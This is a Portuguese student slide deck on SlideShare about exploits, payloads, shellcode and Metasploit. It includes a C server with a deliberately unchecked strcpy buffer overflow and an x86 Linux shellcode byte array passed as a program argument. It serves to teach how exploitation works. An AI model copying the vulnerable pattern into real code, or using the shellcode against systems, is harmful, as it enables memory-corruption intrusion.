EXPLOIT 
COMPLEXIDADE DE ALGORITMOS 
Professor Edson Lima 
DENIS VIEIRA 
NONDAS JUNIOR
Exploit, Payload e Shellcode
listen(Sock, 1); 
while(1) 
{ 
Tam = sizeof(struct sockaddr_in); 
if((Novo=accept(Sock, (struct sockaddr *)&Cliente,&Tam))...
Shellcode 
unsigned char cod[]={ 
0xeb,0x1f, 
0x90,0x90,0x90,0x90, 
0x5e, 
0x31,0xc0, 
0x88,0x46,0x07, 
0x89,0xf3, 
0xb0,0...
ARMITAGE – MSFCONSOLE - MFSCL
O metasploit e ferramenta utilizada em 
grande escala por profissionais de 
segurança. Desenvolvido por HD Moore 
especial...
ARMITAGE
MSFCONSOLE
MFSCL
Conficker
RPC DCOM
Apresentação exploit
Próximos SlideShares
Carregando em…5
×

Apresentação exploit

631 visualizações

Publicada em

Apresentação sobre exploit e o metaexploit

Publicada em: Software
0 comentários
0 gostaram
Estatísticas
Notas
  • Seja o primeiro a comentar

  • Seja a primeira pessoa a gostar disto

Sem downloads
Visualizações
Visualizações totais
631
No SlideShare
0
A partir de incorporações
0
Número de incorporações
4
Ações
Compartilhamentos
0
Downloads
17
Comentários
0
Gostaram
0
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Apresentação exploit

  1. 1. EXPLOIT COMPLEXIDADE DE ALGORITMOS Professor Edson Lima DENIS VIEIRA NONDAS JUNIOR
  2. 2. Exploit, Payload e Shellcode
  3. 3. listen(Sock, 1); while(1) { Tam = sizeof(struct sockaddr_in); if((Novo=accept(Sock, (struct sockaddr *)&Cliente,&Tam))==1) exit(1); memset(Mens,0,strlen(Mens)); if(read(Novo,Mens,sizeof(Mens)) < 0) exit(2); TrataMensagem(Mens); close(Novo); }v oid TrataMensagem(char *Mens) { char Buffer[256]; strcpy(Buffer,Mens); /* VULNERABILIDADE: caso Mens seja maior que 256, haverá o estouro*/ }
  4. 4. Shellcode unsigned char cod[]={ 0xeb,0x1f, 0x90,0x90,0x90,0x90, 0x5e, 0x31,0xc0, 0x88,0x46,0x07, 0x89,0xf3, 0xb0,0x08, 0xb9,0xff,0xf1,0xff,0xff, 0xcd,0x80, 0xb0,0x01, 0x31,0xdb, 0xcd,0x80, 0x90,0x90,0x90,0x90, 0xe8,0xe0,0xff,0xff,0xff,0}; Program.exe param1, pram2, cod
  5. 5. ARMITAGE – MSFCONSOLE - MFSCL
  6. 6. O metasploit e ferramenta utilizada em grande escala por profissionais de segurança. Desenvolvido por HD Moore especialista em segurança, teve sua primeira versão escrita em Perl e lançada em Outubro de 2003, a versão 2.0 de Abril de 2004 reescrita em Ruby contava com 19 exploits e alguns payloads. Em 2009, a empresa Rapid7 adquire o projeto Metasploit e a ferramenta ganha força da comunidade envolvida em segurança da informação.
  7. 7. ARMITAGE
  8. 8. MSFCONSOLE
  9. 9. MFSCL
  10. 10. Conficker
  11. 11. RPC DCOM

×